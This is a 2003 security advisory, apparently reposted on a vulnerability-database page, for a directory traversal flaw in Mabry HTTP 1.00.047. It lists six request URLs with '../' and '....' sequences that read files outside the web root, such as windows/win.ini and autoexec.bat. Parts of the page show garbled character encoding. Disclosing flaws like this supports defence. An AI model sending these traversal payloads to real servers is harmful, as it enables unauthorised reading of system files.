Lucene search
MABRYdtv.txt
ποΈΒ 11 Jul 2003Β 00:00:00Reported byΒ Dr. InsaneTypeΒ 
Β packetstormπΒ packetstormsecurity.comπΒ 21Β Views
Directory traversal in Mabry HTTP allows file access outside HTML root, risking root compromise.
Show more
`MABRY HTTP Directory Traversal Vulnerabilities
Release Date:
July 10, 2003
Severity:
Root Compromise
Systems Affected:
Mabry HTTP 1.00.047
Description:
A directory traversal vulnerability in the product allows remote attackers to view the
content of files that reside outside the bounding HTML root directory.
When attacker sends a request to server in the following form:
http://127.0.0.1/........../windows/win.ini
http://127.0.0.1/........./autoexec.bat
http://127.0.0.1/.../.../.../.../.../.../scandisk.log
http://127.0.0.1/../../../../../../../../../autoexec.bat
http://127.0.0.1/../../../../../../../../windows/win.ini
http://127.0.0.1/.html/............/autoexec.bat
The server will return the requested files:>
Disclaimer
---------
The author(s) does(do) not have any responsibility for any malicious
use of this advisory or proof of concept code. The code and the
information provided here are for educational purposes only.
The author(s) will NOT be held responsible for any direct or
indirect damages caused by the information or the code
provided here.
Acknowledgements
----------------
Vulnerabillity found and tested by dr_insane
______________________________________________________________________________________
http://mobile.pathfinder.gr - Pathfinder Mobile logos & Ringtones!
http://www.pathfinder.gr - ΓΓΉΓ±Γ₯ΓΓ mail Ñðü ôïà Pathfinder!`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo11 Jul 2003 00:00Current
7.4High risk
Vulners AI Score7.4